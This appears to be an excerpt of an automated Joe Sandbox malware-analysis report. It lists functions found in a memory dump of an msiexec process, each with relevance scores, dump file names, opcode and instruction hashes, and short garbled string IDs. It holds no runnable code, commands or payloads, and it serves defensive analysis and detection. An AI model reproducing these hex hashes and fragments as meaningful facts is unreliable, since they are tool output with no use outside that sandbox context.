                                                                                                                                      • Snapshot File: hcaresult_14_2_2e30000_msiexec.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 151f4908ae7f7f3cf7f193f118f103c815a8c6ee22ec5827c35282d370623bb9
                                                                                                                                      • Instruction ID: b57aa71146f79f00a2e383ceba89a87491ccb71aaac94f0d28427b3f8291ba5e
                                                                                                                                      • Opcode Fuzzy Hash: 151f4908ae7f7f3cf7f193f118f103c815a8c6ee22ec5827c35282d370623bb9
                                                                                                                                      • Instruction Fuzzy Hash: 7AD0673BB40008AFCB049F98EC409DDF776FB98221B448516ED16E3264C6319966DB64
                                                                                                                                      Function 02E36748 Relevance: .0, Instructions: 12COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2526661002.0000000002E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E30000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_2e30000_msiexec.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 30d3d5149df289bc711e1b22b79f22ac702ec9a63e9497533eb1bcf629d70551
                                                                                                                                      • Instruction ID: 490eda4a31bcdd2c6c12e5e86c2bb523edf2b479574f56047cdf649399affb2b
                                                                                                                                      • Opcode Fuzzy Hash: 30d3d5149df289bc711e1b22b79f22ac702ec9a63e9497533eb1bcf629d70551
                                                                                                                                      • Instruction Fuzzy Hash: 73C01234900329CFD515FB62DC44525775BA6E0A017408954A4050A64DDE7C684F8B92

                                                                                                                                      Non-executed Functions

                                                                                                                                      Function 02E36FC8 Relevance: 6.7, Strings: 5, Instructions: 463COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2526661002.0000000002E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E30000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_2e30000_msiexec.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: (oq$(oq$(oq$,q$,q
                                                                                                                                      • API String ID: 0-189141485
                                                                                                                                      • Opcode ID: 1edcf91cbd10a310045f55e08b289fcc9eb51db19fa75314fbcf01e0c4805d08
                                                                                                                                      • Instruction ID: da2210a77262839a1f97060f8e90485cbb2ca17bdceac1e654a6b7dc797b007f
                                                                                                                                      • Opcode Fuzzy Hash: 1edcf91cbd10a310045f55e08b289fcc9eb51db19fa75314fbcf01e0c4805d08
                                                                                                                                      • Instruction Fuzzy Hash: 4D124CB1A40209DFCB16CF68C888AADFBF2BF89315F15D069E815AB265D734EC41CB51
                                                                                                                                      Function 02E3F7F1 Relevance: .3, Instructions: 272COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2526661002.0000000002E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E30000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_2e30000_msiexec.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: ba0f5e013e1720b5f3d8b0433c24c7e998a4d5ab0d3603f64a80075d1b67e59c
                                                                                                                                      • Instruction ID: 9da73525a450ed84bae404a8eea833e791ab6cb2d8051f9797d90d6249def8c2
                                                                                                                                      • Opcode Fuzzy Hash: ba0f5e013e1720b5f3d8b0433c24c7e998a4d5ab0d3603f64a80075d1b67e59c
                                                                                                                                      • Instruction Fuzzy Hash: A7C1A174E00218DFDB14DFA5C994B9DBBB2BF89301F2091A9D809AB355DB34AE81DF50
                                                                                                                                      Function 02E3F150 Relevance: .1, Instructions: 149COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2526661002.0000000002E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E30000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_2e30000_msiexec.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 97c36c8c74e9750ae840600c4f9bbbef4503ce58d229d403d9eb1116c8154e5a
                                                                                                                                      • Instruction ID: 0f5f66ea0b3fe31de29722c29167dcb210cf93e120ef3f01308dde1fb9c30a0f
                                                                                                                                      • Opcode Fuzzy Hash: 97c36c8c74e9750ae840600c4f9bbbef4503ce58d229d403d9eb1116c8154e5a
                                                                                                                                      • Instruction Fuzzy Hash: A0513774E40208CBDB05DFA9C5587EDB7B2FB88305F21E129D404BB298DB759985CF94
                                                                                                                                      Function 02E3F3BF Relevance: .1, Instructions: 148COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2526661002.0000000002E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E30000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_2e30000_msiexec.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 000f6d8d3f05d16fa0abc53f9b1d8a5191710659edf34a81e6391a1d7f7ad2d5
                                                                                                                                      • Instruction ID: 579691eb4877a80f900c51a3bb9faf00c678e340efc9ff2437de6e548b2d7779
                                                                                                                                      • Opcode Fuzzy Hash: 000f6d8d3f05d16fa0abc53f9b1d8a5191710659edf34a81e6391a1d7f7ad2d5
                                                                                                                                      • Instruction Fuzzy Hash: FA514874D81208CFCB06DFA8C5887EDBBB2FB48306F61E119E405AB694D7799881CF94
                                                                                                                                      Function 02E3F33C Relevance: .1, Instructions: 146COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2526661002.0000000002E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E30000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_2e30000_msiexec.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 8a1fcbd4fd294693d9806c015cdba0051ea4ef9ea05e3a22f0e108994df7d4a5
                                                                                                                                      • Instruction ID: 65d5490c7485e4bd2d67f65a8033aa8ab60d7b20ae85ebe2724037b8d77a0cea
                                                                                                                                      • Opcode Fuzzy Hash: 8a1fcbd4fd294693d9806c015cdba0051ea4ef9ea05e3a22f0e108994df7d4a5
                                                                                                                                      • Instruction Fuzzy Hash: 4851F374E81208CFDB15DFA8C5887EDB7B2FB48306F21E119E409AB694D7799881CF54
                                                                                                                                      Function 02E376F1 Relevance: 10.5, Strings: 8, Instructions: 475COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2526661002.0000000002E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E30000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_2e30000_msiexec.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: (oq$(oq$(oq$(oq$(oq$(oq$,q$,q
                                                                                                                                      • API String ID: 0-2212926057
                                                                                                                                      • Opcode ID: 468c42b01ae66504301115d126e62ffd55ae436f5925aff9e25afc9e42c38c19
                                                                                                                                      • Instruction ID: 90f471aba166963b45e0d23305c75fba479487bba59340d23f5ba2fd833fa274
                                                                                                                                      • Opcode Fuzzy Hash: 468c42b01ae66504301115d126e62ffd55ae436f5925aff9e25afc9e42c38c19
                                                                                                                                      • Instruction Fuzzy Hash: A3127D70A402089FDB26CF68D898AAEFBF2FF49319F159599E845DB261D730EC41CB50
                                                                                                                                      Function 02E36920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2526661002.0000000002E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E30000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_2e30000_msiexec.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: \;q$\;q$\;q$\;q
                                                                                                                                      • API String ID: 0-2933265366
                                                                                                                                      • Opcode ID: 0bf7342fcaa00c1f5fec953ea2581667361bcd6d93e471609a4c37124054578b
                                                                                                                                      • Instruction ID: 86bbd298fa41c1dbe9f2915a4b3629f02b3051ab299a1c6ce533d77634ccb452
                                                                                                                                      • Opcode Fuzzy Hash: 0bf7342fcaa00c1f5fec953ea2581667361bcd6d93e471609a4c37124054578b
                                                                                                                                      • Instruction Fuzzy Hash: 66018431780115AFC72ACA3DC448B2577EAAF8976A729E169E806CB370DB71EC41C758